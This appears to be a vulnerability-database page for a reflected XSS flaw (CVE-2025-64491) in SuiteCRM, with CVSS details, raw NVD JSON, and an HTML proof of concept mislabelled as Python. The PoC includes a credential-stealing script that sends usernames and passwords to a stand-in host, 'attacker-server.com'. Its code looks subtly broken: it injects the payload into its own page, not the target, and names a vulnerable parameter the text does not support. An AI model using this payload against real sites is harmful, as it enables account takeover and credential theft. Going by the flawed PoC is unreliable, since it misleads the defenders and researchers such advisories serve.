Security Vulnerability Report
中文
CVE-2025-64491 CVSS 6.1 MEDIUM

CVE-2025-64491

Published: 2025-11-08 01:15:39
Last Modified: 2025-11-25 17:33:02
Source: [email protected]

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and below allow unauthenticated reflected Cross-Site Scripting (XSS). Successful exploitation could lead to full account takeover, for example by altering the login form to send credentials to an attacker-controlled server. As a reflected XSS issue, exploitation requires the victim to open a crafted malicious link, which can be delivered via phishing, social media, or other communication channels. This issue is fixed in version 7.14.8.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM < 7.14.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64491 SuiteCRM Reflected XSS PoC --> <!-- Target: SuiteCRM <= 7.14.7 --> <!-- This PoC demonstrates how an attacker can steal credentials via reflected XSS --> <!DOCTYPE html> <html> <head> <title>CVE-2025-64491 PoC</title> </head> <body> <h2>SuiteCRM Reflected XSS PoC - CVE-2025-64491</h2> <p>Click the link below to see the XSS payload in action:</p> <!-- Replace TARGET_URL with the actual SuiteCRM URL --> <!-- Example XSS payload in URL parameter --> <a href="http://TARGET_URL/index.php?module=Users&action=Login&return_action=index&error=1&msg=<script>alert('XSS CVE-2025-64491')</script>" target="_blank">Malicious Link</a> <!-- Credential Stealing Payload --> <!-- This payload modifies the login form to send credentials to attacker server --> <script> // Payload to steal credentials var xssPayload = ` <script> document.getElementById('login_button').onclick = function() { var username = document.getElementById('user_name').value; var password = document.getElementById('user_password').value; var redirectUrl = 'http://attacker-server.com/steal?u=' + encodeURIComponent(username) + '&p=' + encodeURIComponent(password); window.location.href = redirectUrl; return false; }; <\/script> `; // Inject the payload into the page document.write(xssPayload); </script> <p><strong>Attack Scenario:</strong></p> <ol> <li>Attacker creates a malicious URL with XSS payload</li> <li>Victim clicks the link (via phishing, social media, etc.)</li> <li>Malicious JavaScript executes in victim's browser</li> <li>Login credentials are sent to attacker-controlled server</li> <li>Attacker hijacks the victim's account</li> </ol> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64491", "sourceIdentifier": "[email protected]", "published": "2025-11-08T01:15:39.000", "lastModified": "2025-11-25T17:33:02.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Versions 7.14.7 and below allow unauthenticated reflected Cross-Site Scripting (XSS). Successful exploitation could lead to full account takeover, for example by altering the login form to send credentials to an attacker-controlled server. As a reflected XSS issue, exploitation requires the victim to open a crafted malicious link, which can be delivered via phishing, social media, or other communication channels. This issue is fixed in version 7.14.8."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con clientes (CRM) de código abierto y lista para empresas. Las versiones 7.14.7 e inferiores permiten cross-site scripting (XSS) reflejado no autenticado. La explotación exitosa podría llevar a una toma de control total de la cuenta, por ejemplo, alterando el formulario de inicio de sesión para enviar credenciales a un servidor controlado por un atacante. Como un problema de XSS reflejado, la explotación requiere que la víctima abra un enlace malicioso diseñado, que puede ser entregado a través de phishing, redes sociales u otros canales de comunicación. Este problema está solucionado en la versión 7.14.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.14.8", "matchCriteriaId": "37968BEF-2577-4B8F-AE06-8C9DCEB9C84B"}]}]}], "references": [{"url": "https://github.com/SuiteCRM/SuiteCRM/commit/40da2845a170832a4e9e9fa0ebe731f8c34de42d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-prfm-6667-x3mv", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.